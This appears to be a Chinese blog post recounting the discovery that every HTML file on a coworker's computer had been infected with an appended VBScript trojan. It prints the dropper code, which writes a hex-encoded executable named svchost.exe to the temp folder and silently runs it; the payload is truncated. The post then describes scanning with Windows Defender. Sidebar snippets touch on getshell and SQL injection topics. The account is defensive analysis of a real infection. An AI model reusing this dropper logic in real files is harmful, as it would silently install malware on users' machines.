同事发来的文件是个html,逮到一个疑是感染html,htm,网页文件的木马

最新推荐文章于 2023-11-17 21:38:40 发布
最新推荐文章于 2023-11-17 21:38:40 发布
阅读量423 收藏
点赞数
文章标签: 同事发来的文件是个html

事情是这样子的

远程帮同事搞进销存软件 ,发现软件打开不正常了

如图

102752yfmqgp6pt4ltgr96.jpg

"在此页上的ActiveX控件和本页上的其它部分的交互可能不安全“

我选择继续,是

如下图

103010xn09ltlu9ib5o5b0.png

“当前页面脚本发生错误。%1不是有效的win32应用程序。”

这里我要说一下的,IE浏览器我都是设置过的,正常情况下进入这个页面是不会有这两个提示的

我觉得哪里有猫腻,我按提示路径找到那个html文件,发现如下

104336naycddbdmdc5bs4b.png

在html文件尾部被添加了如下代码

[Visual Basic] 纯文本查看 复制代码

DropFileName = "svchost.exe"

WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000...........后面还有很多"

Set FSO = CreateObject("Scripting.FileSystemObject")

DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName

If FSO.FileExists(DropPath)=False Then

Set FileObj = FSO.CreateTextFile(DropPath, True)

For i = 1 To Len(WriteData) Step 2

FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))

Next

FileObj.Close

End If

Set WSHshell = CreateObject("WScript.Shell")

WSHshell.Run DropPath, 0

//-->

用文本记事本打开一串字符,打开会乱码

105811zzzlc8ccalv66cqm.jpg

这个代码目的是什么吗?只感染一个软件 ?然后检查所有的html文件,

发现所有的html 网页文件全部被修改添加了 ,如图

105913bgnzblwtlht7bgnn.jpg

105916ujivqajmwdzwjomm.jpg

110001dz7wd99fefy30zme.jpg

全盘的文件无一幸免,我不懂编程,但知道这是VBS代码,应该有一段时间了的,本地安装了3X0全家桶的,但好像没有阻止

现在正在挂了一个Win 10 ,用Windows Defender 安全中心扫描中

110757nak7h21dhvj17v7a.jpg

微软自家产品还是可以的

论坛上也有类似的案例,前面我搜索了一下2015年时候就有类似案例的VBS木马(应该算木马)

我这边发帖子,分享整个问题发现的过程

laohu24.gif ,从软件打开异常,发现html网页有问题,第一次发帖子,来支持论坛

8141e8b3bff12788df7d902846dfe0de.gif

PS: 感觉国产杀毒软件(3X0,等不怎么靠谱)

105736dkfyavmfpm4t7za1.jpg

469629a2320730e8d5e903514442cf15.png

胖骁
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
C#判断上传文件是否是图片以防止木马上传的方法
12-30
很多时候木马程序会伪装成其他格式的文件上传到网站,最常见的如图片格式。本文就以C#为例讲述C#判断上传文件是否是图片以防止木马上传的方法,具体方法如下: 方法一:用image对象判断是否为图片 /// <summary> /// 判断文件是否为图片 /// </summary> /// <param name=path>文件的完整路径</param> /// <returns>返回结果</returns> public Boolean IsImage(string path) { try { System.Drawing.Image img = System.Drawing.Imag
PHP实现webshell扫描文件木马的方法
10-19
主要介绍了PHP实现webshell扫描文件木马的方法,涉及php针对数值传输的过滤操作与文件识别等相关安全操作技巧,需要的朋友可以参考下
HTML是网页制作者必须要学习掌握的
12-09
学会HTML语言的好处是什么? 1:很轻松的修改你的网站、博客的网页结构。2:对SEO网站优化很有用处。3:拿来主义,通过保存其他网站页面源代码,适当的修改,可以仿制出你想要的模板。4:当你有一张漂亮的PSD源文件图片时,你可以很轻易的把图片切割制作成网页。5:无论是PHP、ASP、.NET、JSP等网站编程语言,都要用到HTML。6:可以轻松检测出网站是否中了网页木马.和预防网页木马。7:可以向更高一层次进阶:DIV+CSS网页设计。8:看完这篇文章,接下来就可以修改本站提供的模板了。 用什么工具来学习HTML呢? 还是推荐大学使用Dreamweaver软件来学习HTML,Dreamweav
Mysql Getshell总结
qq_51478862的博客
05-05 7921
获取网站根目录方式 (1) phpinfo() 页面:最理想的情况,直接显示web路径 (2) web报错信息:可以通过各种fuzz尝试让目标报错,也有可能爆出绝对路径 (3) 一些集成的web框架:如果目标站点是利用phpstudy、LAMPP等之类搭建的,可以猜测默认路径或者通过查看数据库保存的路径默认路径 winserver的iis默认路径c:\Inetpub\wwwroot linux的nginx一般是/usr/local/nginx/html,/home/wwwroot/default,/usr.
Cmd模式***技术基础
weixin_34054866的博客
02-13 131
Cmd Shell(命令行交互)历史悠久,经典不衰。 本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。文件传输 对于溢出漏洞获得的cmd shell,最大的问题就是如何上传文件。由于蠕虫病毒流行,连接ipc$所 Cmd Shell(命令行交互)历史悠久,经典不衰。 本文旨在介绍和总结一些在命令行下控制Window...
mysql udf 一次渗透测试
whatday的专栏
10-29 351
最近,我对某金融机构做渗透时发现他们拥有自己的内网,并且后端使用的是MySQL 5.7 64-bit。根据以往的经验,我的合作伙伴大多都使用的是MSSQL,因此在我看来这是一个非常罕见的场景。我在web应用中发现了SQL注入漏洞,使我可以从mysql.user dump用户名和密码,并且我还发现我的当前权限允许我将文件写入到磁盘。这也是促使我写这篇文章的原因,希望向大家分享关于在Windows下U...
HTML文件中病毒,文件最下面附有<SCRIPT Language=VBScript><!-- DropFileName = “svchost.exe“
qq_44371321的博客
01-18 2327
HTML文件最后带有: <SCRIPT Language=VBScript><!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000008800000009DAF5C5C824EA25F0055C7EB55610FA4A
批量查杀该死的VBscript “svchost.exe” 脚本挂马
03-21 1732
今天写代码突然发现HTML文件最后多了一段VBscript代码; <SCRIPT Language=VBScript><!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000...
cs生成hta文件源码解析
最新发布
weixin_53665691的博客
11-17 264
一.cs 生成hta文件源码二.源码解析三.解决方法。
360扫描出来html木马,你的电脑真的做好防护了吗?使用360安全卫士木马查杀一键扫描就知道...
weixin_29698641的博客
06-16 916
在如今的生活和工作中,电脑早已经是我们的左右手,但时间久了,电脑也会有状态不在线的时候,对我们的生活与工作造成一定影响。360安全卫士木马查杀在电脑病毒处理这一点上就做得很出色,也是很多人在电脑管理方面会选择的软件。360安全卫士比如在使用电脑的过程中,随着各种软件的下载安装,还有各种网站资料的浏览下载,在不知不觉中电脑就会遭到一些不明病毒的侵扰,这些病毒一旦入侵到电脑的重要程序,就会大量破坏电脑...
C#Webservice+微信小程序上传多个文件
12-25
经过一上午的网上查找,实现的C#写的,Webservice接收微信小程序上传的图片文件,有单个图片的上传代码,也有多个图片的上传代码,包括网页木马验证等程序
SQL注入知识总结
ma963852的博客
03-30 9456
目录 漏洞原理 漏洞危害 利用方式 手工注入 手工注入步骤-基于联合查询: 1、判断注入类型 ​2、查询字段数 3、判断回显位 4、查询数据库的基本信息 5、查询数据库中的数据 报错注入 xpath语法错误 ​ 无回显无报错 1,布尔盲注 2,时间盲注 3,带外注入 4,SQL注入命令执行一 4,SQL注入命令执行二 堆叠注入 HTTP头注入 宽字节注入 二次注入 自动化注入 SQLMAP sqlmap特性 输出的内容 设定目标 综...
使用gcc编译C程序详解(Windows系统)
weixin_42019459的博客
03-25 2573
在Windows系统下,详细演示了使用gcc编译+链接的过程;编译包括:预处理,编译,汇编三个步骤。
赛门铁克杀html病毒,HTML 感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒 查杀解决办法...
weixin_42144201的博客
06-20 907
参考:https://www.cnblogs.com/wuhairui/p/8297614.htmlhttp://www.guopingblog.com/post/100.html最近发现vps流量疯长 看了下统计 也没看到网站有大流量,查看源码才发现网页被添加了一段很长的js 内容大概是这样DropFileName=“svchost.exe”WriteData=“4D5A000020000...
html文件都被感染,virus.html.cloud.1是什么病毒?网站备份被感染如何处理
weixin_42392689的博客
06-16 4869
virus.html.cloud.1是什么病毒?类型:virus.html.cloud.1描述:恶意软件是对病毒、木马、蠕虫、后门程序等危害用户计算机及数据安全的有害软件的统称。危害较大。前两天,对网站数据进行备份下载时,360杀毒查询到网站备份文件有virus.html.cloud.1病毒,后来在逐个盘查就是找不到病毒的位置,没其他的办法,只要把网站文件一个个进行查杀。最后居然在缓存文件里找到该...
html 文件中毒导致Java mail发邮件失败问题复盘
本博客纯属个人网络笔记,如对阁下有用,甚喜;否则,关掉即可,不喜勿喷。专心写代码,不做键盘侠!
02-28 1267
项目中有一个邮件发送的功能,实时监控服务器系统信息,并定时发邮件给系统管理员,邮件发送使用的是 html 格式的邮件正文。 但是最近一次部署后,所有发送邮件操作均没有后台异常,但是收件箱没有收到任何邮件。这是怎么回事儿呢?邮件为什么被送达呢?
24小时轮播怎么实现的_js如何实现木马轮播图效果
weixin_39576066的博客
01-17 105
首先,我们来看一下木马轮播图效果:具体代码如下:(推荐教程:js教程)html部分代码: 旋转木马轮播图 在html部分引入的myStyle.css文件部分代码@charset "UTF-8"; blockquote,body,button,dd,dl,dt,fieldset,form,h1,h2,h3,h4, h5, h6, hr...
html木马制作教程,利用Internet Explorer Object Data漏洞制做全新网页木马
weixin_39886024的博客
06-08 713
今年8月20日,微软公布了一个最高严重等级的重要漏洞--Internet Explorer Object数据远程执行漏洞。这对于网页木马爱好者来说可是一件好事,我们可以用这个漏洞来制做一款全新的暂时不会被查杀的木马了。在介绍如何制做这个全新网页木马前我先给大家简单介绍一下该漏洞。一、漏洞描述该漏洞内由eEye Digital Security发现并于8月20号公布的,微软同一天也发布了相应的公告。...
学sql注入要先学mysql_零基础如何学SQL注入?
weixin_29210727的博客
02-12 405
首先就是要精通各种注入的原理,然后就是多练习了。多说无益,直接奉上sql注入笔记供大家学习!MYSQL注入函数version()——MySQL 版本user()——数据库用户名database()——数据库名@@datadir——数据库路径@@version_compile_os——操作系统版本information_schema 自带数据库information_schema.schemata ...
html一个旋转木马
05-20
以下是一个简单的旋转木马HTML 和 CSS 代码示例: HTML: ```html <div class="carousel"> <div class="item"><img src="img1.jpg"></div> <div class="item"><img src="img2.jpg"></div> <div class="item"><img src="img3.jpg"></div> </div> ``` CSS: ```css .carousel { position: relative; width: 80%; margin: auto; height: 400px; overflow: hidden; } .item { position: absolute; top: 0; left: 0; width: 100%; height: 100%; opacity: 0; transition: all 1s ease; } .item.active { opacity: 1; } .item.next { transform: translateX(100%); } .item.prev { transform: translateX(-100%); } .carousel .item img { width: 100%; height: 100%; object-fit: cover; } .carousel .controls { position: absolute; bottom: 20px; left: 50%; transform: translateX(-50%); display: flex; justify-content: center; align-items: center; } .carousel .controls button { border: none; background: transparent; font-size: 24px; color: #fff; margin: 0 10px; cursor: pointer; outline: none; } ``` JavaScript: ```javascript var items = document.querySelectorAll('.item'); var controls = document.querySelectorAll('.controls button'); var current = 0; function initCarousel() { items[0].classList.add('active'); controls.forEach(function(control) { control.addEventListener('click', handleControlClick); }); } function handleControlClick() { if (this.classList.contains('prev')) { current--; if (current < 0) { current = items.length - 1; } } else { current++; if (current > items.length - 1) { current = 0; } } updateCarousel(); } function updateCarousel() { var prev = current - 1; if (prev < 0) { prev = items.length - 1; } var next = current + 1; if (next > items.length - 1) { next = 0; } items.forEach(function(item) { item.classList.remove('prev', 'active', 'next'); }); items[prev].classList.add('prev'); items[current].classList.add('active'); items[next].classList.add('next'); } initCarousel(); ``` 这是一个基本的旋转木马,它使用 CSS 过渡效果和 JavaScript 来实现轮播。在 HTML 中,我们创建了一个包含图像的 div 元素,并将其包装在一个具有 carousel 类的 div 元素中。然后,我们使用 CSS 将其设置为相对定位,并将其宽度设置为 80%,高度设置为 400px。此后,我们使用 overflow: hidden 隐藏溢出的元素。 接下来,我们为每个图像创建了一个 div 元素,并将其设置为绝对定位。然后,我们使用 opacity: 0 将其隐藏,并使用过渡效果将其设置为所有属性的动画效果。我们还为当前活动的图像添加了 active 类。 在 JavaScript 中,我们选择所有图像元素和控制按钮,并为每个按钮添加了一个点击事件处理程序。我们还创建了一个变量 current,用于跟踪当前活动的图像。 在 initCarousel 函数中,我们将第一个图像设置为活动状态,并将点击事件处理程序添加到所有控件按钮上。 在 handleControlClick 函数中,我们确定用户点击了哪个按钮,并相应地更新 current 变量。然后,我们调用 updateCarousel 函数,它将根据 current 变量更新图像。 在 updateCarousel 函数中,我们确定前一个和下一个图像,并将相应的类添加到每个图像元素中。我们还删除了 prev、active 和 next 类,以确保每个图像只有一个类。 最后,我们调用 initCarousel 函数以启动旋转木马

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值